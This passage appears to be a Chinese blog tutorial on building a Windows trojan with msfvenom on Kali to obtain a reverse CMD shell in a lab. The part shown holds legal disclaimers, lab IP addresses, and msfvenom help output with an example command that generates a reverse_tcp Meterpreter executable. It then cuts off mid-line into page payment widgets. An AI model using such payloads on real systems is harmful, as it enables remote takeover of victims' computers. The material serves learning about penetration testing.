网络安全-木马入侵windows -msfvenom反弹shell(CMD)

本文介绍了如何使用KaliLinux中的msfvenom工具创建针对Windows系统的木马,通过反弹shell获取cmd权限。文章详细讲解了命令行参数的含义,并提到了实际操作中需要注意的事项,如防火墙设置、文件格式和端口监听。最后,作者提醒读者学习网络安全知识应遵守法律法规,勿用于非法活动。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

网络安全-木马入侵windows -msfvenom反弹shell(CMD)

前言
一,我也是初学者记录的笔记
二,可能有错误的地方,请谨慎
三,欢迎各路大神指教
四,任何文章仅作为学习使用
五,学习网络安全知识请勿适用于违法行为
学习网络安全知识请勿适用于违法行为
学习网络安全知识请勿适用于违法行为
学习网络安全知识请勿适用于违法行为
学习网络安全知识请勿适用于违法行为

重要的事情说几次
玩出事了,无论你做了几层NAT
几层代理,都能抓到你
相信中央相信党,犯罪没有好下场

需要做什么呢

使用kali制作木马,利用木马拿到windows主机shell(cmd)

漏洞与木马的区别在于
漏洞是某个系统某个框架,才能用
特定的环境下才可以
但是木马是全部机器都可以用
因为木马相当于软件
如果你电脑不能安装软件那你这个电脑也没啥用

制作木马

还是msf工具,漏洞框架-kali

本次攻击设备为kali,设备IP为192.168.248.136
本次被攻击设备为win10,设备IP为192.168.248.134

 使用msfvenom来生成木马
└─# msfvenom 
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use 
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CCIE-Yasuo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值